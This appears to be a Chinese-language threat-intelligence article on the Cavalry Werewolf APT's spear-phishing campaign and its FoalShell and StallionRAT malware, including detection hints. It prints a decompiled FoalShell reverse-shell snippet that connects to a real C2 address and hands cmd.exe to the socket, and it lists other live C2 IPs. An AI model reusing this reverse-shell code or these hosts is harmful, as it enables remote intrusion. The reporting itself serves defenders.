“骑兵狼人”APT组织(Cavalry Werewolf,又名YoroTrooper和Silent Lynx)通过高度定向的钓鱼攻击积极部署定制恶意软件工具集,利用受信任的政府关系实施入侵。
该活动聚焦能源、采矿和制造业组织,借助两个主要恶意软件家族实现持久化访问和命令执行。
伪装官方通信的鱼叉式钓鱼
威胁行为者使用伪装成吉尔吉斯斯坦合法政府实体(包括经济商务部和交通通信部)官方 correspondence 的鱼叉式钓鱼邮件。
这些邮件携带RAR压缩包,内含FoalShell反向shell或StallionRAT远程访问木马,文件名精心设计以模仿真实官方文档,例如“联合行动三个月成果”或“员工奖金候选名单”。
攻击者模糊了伪装与实际入侵的界限,有证据表明他们可能成功入侵了真实的官方电子邮件账户,以增强行动可信度。
恶意文件路径与检测机会
Picussecurity分析师发现,恶意压缩包通常被下载至%LocalAppData%\Microsoft\Windows\INetCache\Content.Outlook目录——这为监控Outlook缓存活动的安全团队提供了关键检测机会。
该活动的复杂性不仅限于社会工程战术,还融入了多语言恶意软件实现,展示了该组织的技术多样性和对操作安全的重视。
威胁行为者已开发出C#、C++、Go、PowerShell和Python版本的恶意软件变体,每种变体通过不同机制规避检测,同时保持核心命令与控制(C2)功能。
目标扩张迹象:塔吉克语与阿拉伯语文件
分析期间发现的桌面痕迹表明,该组织正准备将目标扩展至俄罗斯以外地区:塔吉克语文件显示其对塔吉克斯坦的兴趣,而阿拉伯语命名文档暗示潜在的中东地区侦察活动。
AsyncRAT安装程序文件的发现进一步凸显了该组织工具包的不断演进和雄心勃勃的行动范围。
FoalShell:多语言后门架构
FoalShell是一种轻量级但高效的反向shell实现,旨在通过受感染系统上的cmd.exe 为攻击者提供命令行访问权限。
恶意软件架构因编程语言而异:
C#版本:简洁TCP连接与隐藏窗口
C#版本通过直接TCP连接C2服务器,并通过隐藏窗口样式保持隐蔽性。
核心功能通过持续循环接收命令,通过cmd.exe 执行,并将标准输出和错误输出返回至位于188.127.225.191:443的C2基础设施。
C++变体:shellcode加载与内存执行
C++变体通过shellcode加载机制采用更复杂的规避技术。
混淆的FoalShell shellcode以“output_bin”名称嵌入可执行文件资源中,被提取后通过VirtualAlloc分配具有读、写、执行(RWX)权限的内存并执行。
shellcode随后对主反向shellcode进行反混淆,再建立与C2服务器109.172.85.63的网络连接:
*(_DWORD *)&name.sa_data[2] = inet_addr("109.172.85.63");
WSAConnect(s, &name, 16, 0LL, 0LL, 0LL, 0LL);
StartupInfo.dwFlags = 257;
StartupInfo.hStdError = (HANDLE)s;
StartupInfo.hStdOutput = (HANDLE)s;
StartupInfo.hStdInput = (HANDLE)s;
CreateProcessA(0LL, (LPSTR)"cmd.exe", 0LL, 0LL, 1, 0, 0LL, &StartupInfo, &ProcessInformation); Go版本利用自有网络栈连接至62.113.114.209:443的C2服务器,并通过将HideWindow参数设为1,强制cmd.exe 进程在隐藏窗口状态下运行。
这种多语言策略使攻击者能够根据目标环境特征和安全态势调整部署策略,从而让传统基于签名的安全解决方案更难检测。
发表评论
您还未登录,请先登录。
登录